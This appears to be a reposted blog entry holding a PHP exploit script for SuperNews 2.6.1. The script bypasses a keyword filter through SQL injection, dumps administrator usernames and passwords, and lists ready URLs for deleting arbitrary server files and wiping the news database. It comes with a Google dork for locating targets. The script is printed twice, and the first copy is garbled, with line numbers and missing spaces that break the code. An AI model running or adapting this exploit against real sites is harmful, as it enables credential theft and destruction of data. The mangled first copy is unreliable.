1.<?php 
2.# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞 
3.# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados" 
4.# Version: 2.6.1 
5.# Tested on: Debian GNU/Linux 
6.7./* 
8.Exploit for educational purpose only. 
9.Note sent to the developer Fernando Pontes by e-mail 90@08sec.com 
10. 
11.SuperNews are a brazilian news system in PHP and MySQL. 
12.Versions priors to 2.6 have a simple SQL Injection on view news. 
13.The developer tried to fix the bug removing keywords like "union" and "select". 
14.But, with a recursion, it's possible to bypass this filters. See: 
15.seselectlect 
16.After removing "select" word, will stay another "select" word. See more: 
17.seSELECTlect 
18. 
19.Another SQL Injection on the administration panel: 
20.When deleting a post, you can inject SQL for delete all news on the database. 
21. 
22.Another vulnerability allows to delete files, on the administration panel: 
23.When deleting a post, a variable called "unlink" will talk to the system the new's image for delete. 
24.But it's possible to delete others files, typing all the file path or using "../". 
25. 
26.Usage: 
27.php exploit.php http://www.unhonker.com/supernews/ 
28. 
29.For more info about vulnerabilities: 
30.php exploit.php moreinfo 
31. 
32.Example: 
33.$ php exploit.php http://www.unhonker.com/news/ 
34. 
35.Supernews <= 2.6.1 SQL Injection Exploit 
36. 
37. 
38.1.Trying to access server... 
39.1.Detecting version... 😮 
40.[!] Version: >2.6.1 🙂 
41.[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php 
42. Type "exploit.php moreinfo" for get others vulnerabilities. 
43.1.Getting user & pass 8-] 
44.User: user1 
45.Pass: pass1 
46. 
47.User: user2 
48.Pass: pass2 
49. 
50.Good luck! 😀 
51. 
52.*/ 
53.54.error_reporting(E_ERROR); 
55.set_time_limit(0); 
56.@ini_set("default_socket_timeout", 30); 
57.58.functionhex($string){ 
59.    $hex=''; // PHP 'Dim' =] 60.    for($i=0; $i< strlen($string); $i++){ 
61.        $hex.= dechex(ord($string[$i])); 
62.    } 
63.    return'0x'.$hex; 
64.} 
65.functionstr_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) { 
66.    $count= 0; 
67.    $offset= strpos($haystack, $needle); 
68.    //If we don't replace the first, go ahead and skip it 69.    if(!$replace_first) { 
70.        $offset+= strlen($needle); 
71.        $offset= strpos($haystack, $needle, $offset); 
72.    } 
73.    while($offset!== false) { 
74.        $haystack= substr_replace($haystack, $replace, $offset, strlen($needle)); 
75.        $count++; 
76.        $offset+= strlen($replace); 
77.        $offset= strpos($haystack, $needle, $offset); 
78.        if($offset!== false) { 
79.            $offset+= strlen($needle); 
80.            $offset= strpos($haystack, $needle, $offset); 
81.        } 
82.    } 
83.    return$haystack; 
84.} 
85.functionremoveaddregex($str) { 
86.  returnstr_replace_every_other('(.*)', '', $str, null, false); 
87.} 
88.functionpreg_quote_working($str) { 
89.  $chars= explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :"); 
90.  foreach($charsas$char) { 
91.    $str= str_replace($char, "\\".$char, $str); 
92.  } 
93.  return$str; 
94.} 
95.96.echo"\nSupernews <= 2.6.1 SQL Injection Exploit"; 
97.echo"\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n"; 
98.99.if($argc!=2) { 
100.  echo"Usage: 
101.php $argv[0] url 
102.Example: 
103.php $argv[0] http://www.unhonker.com/supernews 104.php $argv[0] https://www.unhonker.com/supernews/"; 105.  exit; 
106.} 
107.108.if($argv[1]=="moreinfo") { 
109.  echo"\nMore vulnerabilities: 
110.- Deleting files 
111.  You can deletefiles on the server, after login, using the URL: 
112.   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE 113.  Replace \"ID\"with a valid post ID (will be deleted) andFILE with the file address on the server. 
114.115.- Deleting all news on the database: 
116.  You can deleteall news on the database with one request, only. Look: 
117.   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+ 118.119.  All vulnerabilities discovered by WCGroup.\n"; 
120.  exit; 
121.} 
122.123.$uri= $argv[1]; 
124.if(substr($uri, -1, 1)!="/") { 
125.  $uri.= "/"; 
126.} 
127.$url= $uri."noticias.php?noticia=".urlencode("-1")."+"; 
128.echo"\n 
129.1.Trying to access server..."
; 
130.$accessvr= @file_get_contents($url); 
131.if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) { 
132.  $url= $uri."index.php?noticia=".urlencode("-1")."+"; 
133.} 
134.135.$token= substr(md5(chr(rand(48, 122))), 0, 10); 
136.137.echo"\n 
138.1.Detecting version... :-o"
; 
139.140.$gettoken= strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- "))); 
141.if(preg_match("/".$token."/", $gettoken)) { 
142.  echo"\n[!] Version: >2.6.1 :-)"; 
143.  $version= 1; 
144.} else{ 
145.  $gettoken= strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- "))); 
146.  if(preg_match("/".$token."/", $gettoken)) { 
147.    echo"\n[!] Version =2.6.1 :-)"; 
148.    $version= 2; 
149.  } else{ 
150.    echo"\n[-] Unknown version :-S"; 
151.    $version= 3; 
152.  } 
153.} 
154.if($version!=3) { 
155.  echo"\n[!] Administration panel: {$uri}admin/adm_noticias.php"; 
156.  echo"\n Type \"$argv[0] moreinfo\" for get others vulnerabilities."; 
157.  echo"\n 
158.1.Getting user & pass 8-]"
; 
159.} 
160.161.if($version==1) { 
162.  $i= 0; 
163.  while(true) { 
164.    $request= strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- "))); 
165.    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get); 
166.    if($get[1][0]!="") { 
167.      $user= $get[1][0]; 
168.      $pass= $get[2][0]; 
169.      echo"\nUser: $user\nPass: $pass\n"; 
170.      $i++; 
171.    } else{ 
172.      echo"\nGood luck! :-D"; 
173.      break; 
174.    } 
175.  } 
176.} 
177.elseif($version==2) { 
178.  $i= 0; 
179.  while(true) { 
180.    $request= strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- "))); 
181.    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get); 
182.    if($get[1][0]!="") { 
183.      $user= $get[1][0]; 
184.      $pass= $get[2][0]; 
185.      echo"\nUser: $user\nPass: $pass\n"; 
186.      $i++; 
187.    } else{ 
188.      echo"\nGood luck! :-D"; 
189.      break; 
190.    } 
191.  } 
192.} 
193.else{ 
194.  echo"\n\nThis site are using an unknown version of Supernews or another CMS."; 
195.  echo"\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable."; 
196.  echo"\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables."; 
197.  echo"\nIf you want, try to access manually:"; 
198.  echo"\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection."; 
199.  echo"\nWe're sorry."; 
200.} 
201.202.echo"\n"; 
203.<?php
# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux
 
/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com
 
SuperNews are a brazilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass this filters. See:
seselectlect
After removing "select" word, will stay another "select" word. See more:
seSELECTlect
 
Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.
 
Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".
 
Usage:
php exploit.php http://www.unhonker.com/supernews/
 
For more info about vulnerabilities:
php exploit.php moreinfo
 
Example:
$ php exploit.php http://www.unhonker.com/news/
 
Supernews <= 2.6.1 SQL Injection Exploit
 
 • Trying to access server...• Detecting version... 😮
[!] Version: >2.6.1 🙂
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
 Type "exploit.php moreinfo" for get others vulnerabilities.• Getting user & pass 8-]
User: user1
Pass: pass1
 
User: user2
Pass: pass2
 
Good luck! 😀
 
*/
 
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);
 
function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $offset = strpos($haystack, $needle);
    //If we don't replace the first, go ahead and skip it
    if (!$replace_first) {
        $offset += strlen($needle);
        $offset = strpos($haystack, $needle, $offset);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
        $count++;
        $offset += strlen($replace);
        $offset = strpos($haystack, $needle, $offset);
        if ($offset !== false) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
        }
    }
    return $haystack;
}
function removeaddregex($str) {
  return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
  $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
  foreach($chars as $char) {
    $str = str_replace($char, "\\".$char, $str);
  }
  return $str;
}
 
echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";
 
if($argc!=2) {
  echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] https://www.unhonker.com/supernews/";
  exit;
}
 
if($argv[1]=="moreinfo") {
  echo "\nMore vulnerabilities:
 - Deleting files
  You can delete files on the server, after login, using the URL:
   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
 
 - Deleting all news on the database:
  You can delete all news on the database with one request, only. Look:
   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
 
  All vulnerabilities discovered by WCGroup.\n";
  exit;
}
 
$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
  $uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n• Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
  $url = $uri."index.php?noticia=".urlencode("-1")."+";
}
 
$token = substr(md5(chr(rand(48, 122))), 0, 10);
 
echo "\n• Detecting version... :-o";
 
$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
  echo "\n[!] Version: >2.6.1 :-)";
  $version = 1;
} else {
  $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
  if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version =2.6.1 :-)";
    $version = 2;
  } else {
    echo "\n[-] Unknown version :-S";
    $version = 3;
  }
}
if($version!=3) {
  echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
  echo "\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
  echo "\n• Getting user & pass 8-]";
}
 
if($version==1) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
elseif($version==2) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
else {
  echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
  echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
  echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
  echo "\nIf you want, try to access manually:";
  echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
  echo "\nWe're sorry.";
}
 
echo "\n";
 

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/266.html